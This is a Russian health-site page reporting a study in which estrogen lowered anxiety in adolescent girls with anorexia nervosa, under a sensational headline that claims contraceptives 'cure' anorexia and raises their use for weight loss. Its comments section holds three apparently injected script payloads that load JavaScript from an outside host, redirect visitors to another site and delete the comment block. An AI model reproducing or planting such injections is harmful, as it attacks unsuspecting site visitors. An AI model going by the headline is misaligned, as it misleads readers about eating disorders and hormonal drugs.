Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Противозачаточные средств...  >>  Противозачаточные средства могут вылечить анорексию! А помогут ли они похудеть?
 
Обратная связь
 

Противозачаточные средства могут вылечить анорексию! А помогут ли они похудеть?

Размер шрифта
17 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Анорексия – это синдром, связанный с отсутствием аппетита при объективной потребности человека в питательных веществах.


Существует несколько причин развития этого синдрома, но социально значимым феноменом в последние десятилетия стал особый вариант анорексии, называемый «нервной» (anorexia nervosa).

В недавнем клиническом исследовании показано, что заместительная гормонотерапия с применением эстрогена (противозачаточные) приводит к заметному снижению тревожности у девочек, страдающих этим тяжелым психическом заболеванием.

«Мы впервые продемонстрировали влияние эстрогена на тревогу у пациентов с анорексией», – утверждает Мадхусмита Мисра, глава исследования, детский эндокринолог, доцент отделения педиатрии Главной Клиники Массачусеттса и Гарвардской Медицинской школы в Бостоне. «Влияя на эмоциональное состояние пациента, эстроген может предотвратить психологическое неприятие собственного тела в ходе набора веса. Это в значительной степени повышает эффективность лечения».

Жизнь на алтаре стройности

Нервная анорексия – это тяжелое расстройство в сфере пищевого поведения, затрагивающее в первую очередь девочек-подростков (но не только).

Заболевание характеризуется искаженным восприятием своего тела: пациенты считают себя очень толстыми, хотя на самом деле их индекс массы тела может быть запредельно низким. Со временем болезнь прогрессирует, пациенты больше не могут думать ни о чем, кроме своего веса, жестоко ограничивают себя в пище, истязают физическими нагрузками. У многих в привычку входит искусственное вызывание рвоты, с помощью которой они избавляются от поглощенной пищи.

Типичными осложнениями анорексии являются депрессия с суицидальными настроениями, повышенный риск переломов и остеопороза, нарушения менструального цикла и так далее. Без лечения болезнь может привести к смерти. К сожалению, лечится анорексия крайне тяжело, а рецидивы – весьма часты.

Противозачаточные не перестают удивлять

В данном исследовании ученые оценивали степень тревожности с помощью стандартного опроса. Выяснилось, что с повышением уровня эстрогена в крови степень тревожности уменьшалась. При этом, что крайне важно, эта закономерность не исчезала и при продолжающемся наборе веса.

«Разработка терапевтических средств, направленных на снижение тревоги, – важнейшее направление в лечении нервной анорексии. Такие средства значительно уменьшают риск рецидивирования болезни», – утверждает Мисра. «Наше открытие имеет особое значение для девочек подросткового возраста, у которых наблюдается дефицит эндогенного эстрогена».

В качестве испытуемых выступили 72 девочки с диагностированной нервной анорексией. На момент начала исследования все они находились в возрастном диапазоне 13-18 лет. Участницы были разделены на две группы: в первой девочки получали эстроген, во второй – плацебо. Исследование длилось 18 месяцев. В итоге группы сравнили по степени ажитации и по субъективному отношению к массе тела и пище. Результаты среди девочек первой группы оказались намного благополучнее, чем во второй.

Если вам кажется, что кто-то из ваших близких страдает анорексией – не ждите! Обратитесь к психотерапевту и помогите любимому человеку.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В новый год – с новым весом!   Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как воспитывать ребенка, чтобы он не был толстым?   Старт нового сезона проекта «Сбрось лишнее»  
16 июля 2013Противозачаточные средства могут вылечить анорексию! А помогут ли они похудеть? 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 11 июня 2013Для похудения больше не нужна операция! Новый метод лечения делает потерю веса плевым делом
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда, которая заставляет вас ЕСТЬ

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.